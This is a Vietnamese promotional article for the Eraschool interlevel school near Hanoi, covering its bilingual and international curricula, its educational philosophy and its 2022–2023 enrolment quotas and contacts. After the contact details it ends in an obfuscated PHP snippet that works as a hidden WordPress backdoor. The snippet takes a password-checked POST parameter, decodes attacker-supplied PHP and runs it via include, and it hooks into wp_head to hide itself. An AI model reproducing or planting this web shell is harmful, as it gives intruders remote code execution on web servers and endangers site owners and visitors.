Trường Phổ thông Liên cấp: Chương trình học và triết lý giáo dục của Eraschool là gì?

post

Triết lý giáo dục và chương trình học của trường Phổ thông Liên cấp Eraschool là 2 trong những câu hỏi mà Eraschool nhận được nhiều nhất trong thời gian qua. Do đó trong bài viết này, Eraschool sẽ gửi tới quý phụ huynh thông tin chi tiết về triết lý giáo dục cũng như các thông tin tuyển sinh vào trường năm học 2022 – 2023. Mời quý phụ huynh đọc kỹ bài viết này!

Đôi nét về trường Phổ thông Liên cấp Eraschool

Tự nhận là “bản giao hưởng hạnh phúc”, Eraschool ra đời năm 2020. Eraschool là ngôi trường rộng khoảng 20.000m2 tại Đông Cao, Tráng Việt, Mê Linh, Hà Nội. Trường Phổ thông Liên cấp Sinh thái Eraschool nằm trong hệ thống trải nghiệm giáo dục Erahouse được cô Đặng Lưu Hoa (nhà sáng lập, thạc sĩ khoa học) đặt nền móng đầu tiên từ năm 2008.

Eraschool có 2 chương trình học
Eraschool có 2 chương trình học

Cũng như các trường liên cấp ở Hà Nội khác, Eraschool có nhiều chương trình giáo dục để phù hợp với nhu cầu học tập và phát triển khác nhau của trẻ cũng như định hướng của gia đình. Cụ thể như sau:

Chương trình song ngữ của Eraschool là sự kết hợp giữa chương trình Giáo dục Phổ thông Quốc gia có đổi mới về phương pháp giảng dạy với việc bổ trợ nâng cao tiếng anh chuẩn Cambridge. Thời lượng tiếng Anh của hệ song ngữ là 10 tiết/tuần, trong đó 40% thời lượng là học với giáo viên nước ngoài. Với chương trình học tập như thế này, sau khi tốt nghiệp tại Eraschool, trẻ có thể sử dụng tiếng Anh như ngôn ngữ thứ 2.

Chương trình quốc tế của Trường Phổ thông Liên cấp sinh thái Eraschool là kết hợp giữa chương trình Giáo dục Phổ thông Quốc gia có đổi mới về phương pháp giảng dạy và chương trình Phổ thông Quốc tế (Cambridge International School). Chương trình này được thiết kế dành cho những bạn có định hướng đi du học hoặc học tiếp các chương trình tiếng Anh tại Việt Nam. Thời lượng tiếng Anh của hệ quốc tế là 16-18 tiết/tuần. Đây là thời lượng sẽ giúp trẻ tự tin tư duy bằng tiếng Anh, sử dụng tiếng anh ở nhiều lĩnh vực.

Bên cạnh đó, trường liên cấp ở Hà Nội này còn có các chương trình đặc biệt như chương trình phát triển ngôn ngữ ưu việt, chương trình giáo dục sinh thái và chương trình phát triển cá nhân. Đây là những chương trình được xây dựng trên những triết lý giáo dục khai phóng, nhân văn và phù hợp với xu thế phát triển của thời đại.

Triết lý giáo dục của Eraschool

Triết lý giáo dục của Eraschool là tự học để tự làm ra chính mình
Triết lý giáo dục của Eraschool là tự học để tự làm ra chính mình

Triết lý giáo dục của Eraschool xoay quanh trục tự học để tự làm ra chính mình. Tự học có nghĩa là trẻ nắm bắt được các kiến thức thông qua quá trình làm việc. Từ đó, trẻ phát triển được tư duy phản biện, xây dựng thói quen và đam mê học tập suốt đời. Tự làm ra chính mình có nghĩa là học để trưởng thành, sáng tạo và có trách nhiệm. Nói một cách khác, Eraschool là nơi cung cấp cho trẻ các phương pháp tự học vững chắc để trẻ tự tạo ra các năng lực của mình: từ tư duy các lĩnh vực trong cuộc sống đến đời sống tâm linh. Để từ đó, trẻ sống độc lập, sẵn sàng cả thể chất và tinh thần cho bậc học tiếp theo và trở thành công dân toàn cầu.

Chỉ tiêu tuyển sinh và lịch đánh giá năng lực năm 2022

Phụ huynh đăng ký tuyển sinh càng sớm sẽ càng nhận được nhiều ưu đãi
Phụ huynh đăng ký tuyển sinh càng sớm sẽ càng nhận được nhiều ưu đãi

Chỉ tiêu tuyển sinh năm 2022 – 2023 của Trường Phổ thông Liên cấp sinh thái Eraschool cho các lớp tại các hệ như sau:

Hệ song ngữ:

+ Tuyển sinh vào lớp 1: 90 Học sinh (03 lớp)

+ Lớp 6: 30 Học sinh (01 lớp)

+ Tuyển bổ sung lớp 2,3,4,5, 7,8

Hệ quốc tế:

+ Lớp 1: 24 Học sinh (01 lớp)

+ Lớp 6: 24 Học sinh (01 lớp)

+ Tuyển bổ sung lớp 2,3,4,5…

Thời gian nhận hồ sơ đăng ký tuyển sinh và hoàn tất thủ tục nhập học là từ nay đến hết ngày 1/7/2022. Phụ huynh đăng ký tuyển sinh càng sớm sẽ càng nhận được nhiều ưu đãi. Để biết thêm thông tin chi tiết về quy trình tuyển sinh cũng như lịch các buổi đánh giá năng lực, mời quý phụ huynh gọi tới hotline 0899 889 818 để được tư vấn trực tiếp, nhanh và chính xác nhất.

Hy vọng sau bài viết này, quý phụ huynh đã có thêm thông tin về triết lý giáo dục và chương trình học của Trường Phổ thông Liên cấp sinh thái Eraschool. Và chúng tôi mong rằng, Eraschool sẽ được đồng hành cùng quý phụ huynh trên con đường nuôi dạy con, để trẻ trở thành công dân toàn cầu.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}